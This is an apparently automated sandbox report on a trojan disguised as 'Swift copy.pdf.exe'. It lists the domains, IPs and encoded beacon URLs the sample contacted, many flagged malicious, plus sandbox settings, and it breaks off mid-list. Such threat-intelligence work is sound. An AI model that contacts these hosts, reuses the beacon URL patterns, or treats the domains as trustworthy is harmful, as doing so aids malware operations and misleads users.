          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix0%Avira URL Cloudsafe
          http://en.w0%URL Reputationsafe
          http://en.w0%URL Reputationsafe
          http://en.w0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/pics/12471/arrow.png)0%Avira URL Cloudsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf0%Avira URL Cloudsafe
          http://www.ascendercorp.com/typedesigners.htmlv0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff20%Avira URL Cloudsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff20%Avira URL Cloudsafe
          http://www.zhongyicts.com.cnd&~u0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cno.n0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          hosted.fireside.fm
          		45.33.51.100
          		truefalse
            		high
            wapgoals.com
            		34.102.136.180
            		truefalseunknown
            marktheoilguy.com
            		184.168.131.241
            		truetrueunknown
            www.rileysboutique.com
            		74.208.236.87
            		truetrueunknown
            technomark.xyz
            		174.136.25.55
            		truetrueunknown
            www.stepmed.life
            		5.101.123.53
            		truetrue
              		unknown
              agenciaorange.net
              		51.222.80.112
              		truetrue
                		unknown
                www.indiafoodtraveling.com
                		204.11.56.48
                		truetrue
                  		unknown
                  www.agenciaorange.net
                  		unknown
                  		unknowntrue
                    		unknown
                    www.lehoachi.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.marktheoilguy.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.technomark.xyz
                        		unknown
                        		unknowntrue
                          		unknown
                          www.wapgoals.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.criticalredux.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.criticalredux.com/ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6ttrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.wapgoals.com/ifne/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6ttrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.wapgoals.com/ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6tfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.rileysboutique.com/ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6ttrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.indiafoodtraveling.com/ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6ttrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eotcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersGSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woffcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.html8Swift copy.pdf.exe, 00000000.00000003.334591290.0000000005765000.00000004.00000001.sdmpfalse
                                      		high
                                      http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woffcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.tiro.comexplorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designersexplorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.indiafoodtraveling.com/px.js?ch=2cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tiro.comFSwift copy.pdf.exe, 00000000.00000003.328467490.000000000574B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.indiafoodtraveling.com/px.js?ch=1cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.goodfont.co.krSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comSwift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otfcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssSwift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpfalse
                                            		high
                                            http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttfcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sajatypeworks.comSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefixcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.typography.netDSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn/cTheSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.como.nSwift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/nSwift copy.pdf.exe, 00000000.00000003.337103443.0000000005765000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.carterandcone.comdjqSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/zSwift copy.pdf.exe, 00000000.00000003.337103443.0000000005765000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleaseSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fonts.comSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.sandoll.co.krSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSwift copy.pdf.exe, 00000000.00000002.351601216.0000000002791000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.carterandcone.como.Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comSwift copy.pdf.exe, 00000000.00000003.332090387.0000000005765000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comLSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.indiafoodtraveling.com/sk-logabpstatus.php?a=OHpkUkI0Y0QxUWRjUnVBV284aHBwcjQ2RmVkZlhNYU5Ycscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eotcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000007.00000002.591935318.000000000095C000.00000004.00000020.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers/cabarga.htmllSwift copy.pdf.exe, 00000000.00000003.334591290.0000000005765000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.tiro.comS~Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://www.jiyu-kobo.co.jp/AqSwift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-bcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/pics/12471/logo.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/pics/12471/bodybg.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carterandcone.comuSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fontbureau.commHSwift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-rcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carterandcone.comsSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.zhongyicts.com.cnsSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otfcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carterandcone.coma-dSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefixcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://en.wSwift copy.pdf.exe, 00000000.00000003.328158175.0000000005739000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/pics/12471/arrow.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttfcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carterandcone.comlSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                          		unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlNSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.ascendercorp.com/typedesigners.htmlvSwift copy.pdf.exe, 00000000.00000003.332048994.000000000576D000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cnSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/frere-jones.htmlSwift copy.pdf.exe, 00000000.00000003.334358377.0000000005765000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fontbureau.commSwift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.jiyu-kobo.co.jp/Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.zhongyicts.com.cnd&~uSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://www.fontbureau.com/designers8Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.zhongyicts.com.cno.nSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fontbureau.comltom4~gSwift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		low
                                                                http://www.jiyu-kobo.co.jp/o.HSwift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/12471/libgh.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/12471/libg.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/12471/kwbg.jpg)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                174.136.25.55
                                                                		technomark.xyzUnited States
                                                                		33494IHNETUStrue
                                                                204.11.56.48
                                                                		www.indiafoodtraveling.comVirgin Islands (BRITISH)
                                                                		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                45.33.51.100
                                                                		hosted.fireside.fmUnited States
                                                                		63949LINODE-APLinodeLLCUSfalse
                                                                74.208.236.87
                                                                		www.rileysboutique.comUnited States
                                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                34.102.136.180
                                                                		wapgoals.comUnited States
                                                                		15169GOOGLEUSfalse
                                                                51.222.80.112
                                                                		agenciaorange.netFrance
                                                                		16276OVHFRtrue
                                                                5.101.123.53
                                                                		www.stepmed.lifeEstonia
                                                                		198068PAGM-ASEEtrue

                                                                General Information

                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                Analysis ID:385261
                                                                Start date:12.04.2021
                                                                Start time:09:13:29
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 12m 10s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Sample file name:Swift copy.pdf.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:26
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@10/1@10/7
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 21% (good quality ratio 19.5%)
                                                                • Quality average: 73.4%
                                                                • Quality standard deviation: 30.5%
                                                                HCA Information:
                                                                • Successful, ratio: 98%
                                                                • Number of executed functions: 107
                                                                • Number of non-executed functions: 136
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.210.154, 92.122.145.220, 205.185.216.42, 205.185.216.10, 52.255.188.83, 40.88.32.150, 92.122.213.194, 92.122.213.247, 52.147.198.201, 104.43.193.48, 2.20.142.210, 2.20.142.209, 52.155.217.156, 104.43.139.144, 20.54.26.129, 172.217.168.51, 184.30.20.56, 20.50.102.62, 104.42.151.234
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, ghs.google.com, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                09:14:27API Interceptor1x Sleep call for process: Swift copy.pdf.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                204.11.56.48remittance info.xlsxGet hashmaliciousBrowse
                                                                • www.fantastic-male-size.com/svh9/?5ja0c8yp=ij+ZgDP7l8XO4EzkWM1OWxe5DYkBfQhdxOd2KtRjfzMns0aOs1qKxh/wbOk7VKZjQ4PRQQ==&2dn4M=z4DhUBy8
                                                                BL836477488575.exeGet hashmaliciousBrowse
                                                                • www.network70.com/mb7q/?-ZbLpz4=lcZnn44wJ8CTD/wuULHOZdDNfKQLJFUDWmrmbSvd29smf4FbT3Q6nZbQmfWo5SiyjEZ6&3f=Blgp
                                                                BL84995005038483.exeGet hashmaliciousBrowse
                                                                • www.mindframediscovery.com/mb7q/?Kzr4=MylpREVFpgK4hrQJLFGzZ7Eq8Ut192MqXeIW4x2M7+nc5esW3mvXBXSCpu2ngoz0Ij7R0ObYFg==&OtZlC2=JPhH0LRX981dlx
                                                                Formbook.exeGet hashmaliciousBrowse
                                                                • www.1396999.com/oez8/?ePI=pEvz6wUm7NkDB5cAyTZ1gvh/y9KWyAJdvyJqwgzLh6QntoRS8UVJV4gWCXXdvhTiuHaU&uZhx9b=tXxhAn0
                                                                deIt7iuD1y.exeGet hashmaliciousBrowse
                                                                • www.tiprent.com/vu9b/?1bz=jDKPMV0Psx7H2j&KnhT=z/Zq9jVkIB0yGNn3ZEHZ6NHzXk34EmaVGtMXpz0iQLYDo7kK3EXAn5/5Znk5N1+qJLeSjTna4g==
                                                                ZGNbR8E726.exeGet hashmaliciousBrowse
                                                                • www.hipnoseportugal.com/m2be/?GVFTh=fyh/eIcUW0aiZCQyfMwwrsLD1ZW7Cr5WD4UuPwf+M/sE8+UpRfQsAB3ccWCzN2YO30SJ&tv5P=ilQ8UxJh
                                                                MV Sky Marine.xlsxGet hashmaliciousBrowse
                                                                • www.felinewish.com/m2be/?pL00NNc=cTSgjfXDnz2bFoWdUkD9Bhu82D9jmXmOM4nRLHyyc50s9vDYx1pRS3bEvpVoGpgOgfMfdQ==&SJE=yZ8l2HUp_
                                                                fDFkIEBfpm.exeGet hashmaliciousBrowse
                                                                • www.felinewish.com/m2be/?kpNL=cTSgjfXGn02fF4aRWkD9Bhu82D9jmXmOM4/BXEuzYZ0t9eve2l4dEzjGsPZuNY0F154o&MZ=K40xTRg8v
                                                                4TYyYEdhtj.exeGet hashmaliciousBrowse
                                                                • www.felinewish.com/m2be/?nP3hnH=cTSgjfXGn02fF4aRWkD9Bhu82D9jmXmOM4/BXEuzYZ0t9eve2l4dEzjGsPVXB5YFi/k5EjPA0A==&DrFXA=8pDXBtXPJP
                                                                xPUqa4qbDL.jsGet hashmaliciousBrowse
                                                                • legitville.com/0.html
                                                                xPUqa4qbDL.jsGet hashmaliciousBrowse
